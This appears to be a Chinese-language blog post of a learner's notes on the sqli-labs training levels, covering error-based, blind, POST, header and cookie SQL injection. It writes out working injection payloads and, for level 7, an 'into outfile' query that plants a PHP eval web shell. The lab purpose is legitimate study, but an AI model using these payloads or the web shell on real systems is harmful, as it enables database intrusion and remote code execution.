<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="sqli-labs-master第五关（报错注入）： 布尔注入与报错注入的区别 报错注入会提示具体的错误信息，我们可以将我们要知道的信息在报错里弄出来 1 union select count(* ),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x; 1 union select up">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2021/04/24/sqli-labs-master/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="sqli-labs-master第五关（报错注入）： 布尔注入与报错注入的区别 报错注入会提示具体的错误信息，我们可以将我们要知道的信息在报错里弄出来 1 union select count(* ),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x; 1 union select up">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210418164710521.png">
<meta property="og:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210418170544789.png">
<meta property="og:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210418165653031.png">
<meta property="og:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210418170450599.png">
<meta property="og:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210421211934654.png">
<meta property="og:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210421214637424.png">
<meta property="og:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210421214610257.png">
<meta property="article:published_time" content="2021-04-24T00:07:53.569Z">
<meta property="article:modified_time" content="2021-04-23T11:50:11.152Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/ASUS/AppData/Roaming/Typora/typora-user-images/image-20210418164710521.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-sqli-labs-master" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2021/04/24/sqli-labs-master/" class="article-date">
  <time class="dt-published" datetime="2021-04-24T00:07:53.569Z" itemprop="datePublished">2021-04-24</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="sqli-labs-master"><a href="#sqli-labs-master" class="headerlink" title="sqli-labs-master"></a>sqli-labs-master</h1><p>第五关（报错注入）：</p>
<p><strong>布尔注入与报错注入的区别</strong></p>
<p>报错注入会提示具体的错误信息，我们可以将我们要知道的信息在报错里弄出来</p>
<p>1 union select count(* ),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x;</p>
<p>1 union select updatexml(1,cocnat(,0x7e,(database()),0x7e),1)</p>
<p>布尔盲注只会给你说这句话有错但是不会具体说是哪错了</p>
<p>第八关（布尔盲注）</p>
<p>?id=1</p>
<p>回显，但与前几关不一样，所以这里不能像前几关联合查询，我们得“猜”库名，表名，列名</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210418164710521.png" alt="image-20210418164710521"></p>
<p>?id=1’</p>
<p>不回显，说明是字符型</p>
<p>可以大概猜到语句为   select * from database_name where id=’id’ …..;</p>
<p>第一步</p>
<p>先确定库的字数</p>
<p>构造语句：?id=1’ and if(length(database())=1,sleep(3),1)–+</p>
<p>可以一个一个试，这样比较浪费时间，我们这里换个快点的方式，可以用burp抓包来爆破</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210418170544789.png" alt="image-20210418170544789"></p>
<p>抓下来的包是这样的，url里的构造语句被浏览器编码了，不要改，否则放包之后会报错</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210418165653031.png" alt="image-20210418165653031"></p>
<p>具体作用，自己上网上找吧</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210418170450599.png" alt="image-20210418170450599"></p>
<p>爆破结束之后看到有Length有两种长度，934和950从构造的语句分析可知，库名长度=8是对的</p>
<p>库名长度出来后再用二分法一个一个“猜”每个位置的字符是什么，当然也可以用爆破</p>
<p>第六关与第五关差不多，方法是一样的，只是一个是’  另一个是”</p>
<p>第七关</p>
<p><strong>导出文件注入</strong></p>
<p>Less7.字符型 闭合方式（(‘内容 ‘)） 构造的闭合语句是 id=-1’)) 内容 #</p>
<p>获取文件导入导出允许路径，利用@@datadir-&gt;数据库存储路径 @@basedir-&gt;mysql安装路径</p>
<p>将写入恶意代码的内容查询结果导出到本地，菜刀连接</p>
<p>union select 1,2,’<?php @eval($_POST["cmd"]);?>‘ into outfile “路径地址” –+</p>
<pre><code>1
</code></pre>
<p>Ps：这里需要开启mysql的导入导出文件权限，在my.ini配置secure_file_priv =<br>查看文件 load_file()函数<br>写入文件 into outfile -mysql语句</p>
<p>待补充</p>
<p>待补充</p>
<p>待补充</p>
<p>第九关（时间盲注）</p>
<p>先要确定闭合方式</p>
<p>?id=1”(‘) sleep(3) 如何前面闭合，则语句为’1’ sleep(3)…. 如果没有语句为’1 sleep(3)’</p>
<p>语句错不错回显都是一样的，这时我们就不能根据回显来判断了，我们可以设置时间差，比如如果语句返回的结果是true则直接返回，如果是flash则”睡一会”在返回，形成时间差来区别对错</p>
<p>第十关与第九关差不多</p>
<p>第十一关</p>
<p>POST方式传参</p>
<p>有错误信息，可以根据错误信息来判断格式  构造语句绕过?id=1’ or 1=1#</p>
<p>POST传参我们不能在url中变化，可以用Hackbar工具来改</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210421211934654.png" alt="image-20210421211934654"></p>
<p>构造语句与最前面几关一样，但要将后面的passwd参数加上</p>
<p>第十二关与第十一关差不多，只是格式变了</p>
<p>第十三关（二次注入）</p>
<p>构造语句</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210421214637424.png" alt="image-20210421214637424"></p>
<p>没有回显报错，但语句错误时会返回错误信息，报错注入</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210421214610257.png" alt="image-20210421214610257"></p>
<p>之后语句与GET传参差不多</p>
<p>第十四关与第十三关差不多</p>
<p>第十五，十六关（布尔盲注）</p>
<p>第十七关（update注入）</p>
<p>updatexml函数：</p>
<p>将制定的变量的只修改，返回修改后的数据，不管对错</p>
<p>uname=admin &amp;passwd=1’ or updatexml(1,concat(0x7e,(database()),0x7e),1)#</p>
<p>第十八关（头部注入——User-Agent）</p>
<p>前提是你知道一个正确的账号和密码</p>
<p>1’ or updatexml(1,concat(0x7e,(database()),0x7e),1) or ‘1’=’1</p>
<p>“INSERT INTO <code>security</code>.<code>uagents</code> (<code>uagent</code>, <code>ip_address</code>, <code>username</code>) VALUES (‘$uagent’, ‘$IP’, $uname)”;</p>
<p>“INSERT INTO <code>security</code>.<code>uagents</code> (<code>uagent</code>, <code>ip_address</code>, <code>username</code>) VALUES (‘’, ‘$IP’, $uname)”;</p>
<p>导出文件注入</p>
<p>第十九关（Referer）</p>
<p>第二十关（cookie注入）</p>
<p>跟第十八关的语句一样，只是位置变了</p>
<p>sql注入做题步骤</p>
<p>先确定是什么类型（字符型，数字型）——》再确定闭合方式——》再确定传送的形式是GET或者是POST——》再确定是什么类型的注入</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2021/04/24/sqli-labs-master/" data-id="cknuzoovy0001q4uga6qjh6w4" data-title="" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2021/04/17/%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%8D%9A%E5%AE%A2/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">我的第一个博客</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/04/">April 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/04/24/sqli-labs-master/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/04/17/%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%8D%9A%E5%AE%A2/">我的第一个博客</a>
          </li>
        
          <li>
            <a href="/2021/04/17/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2021 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>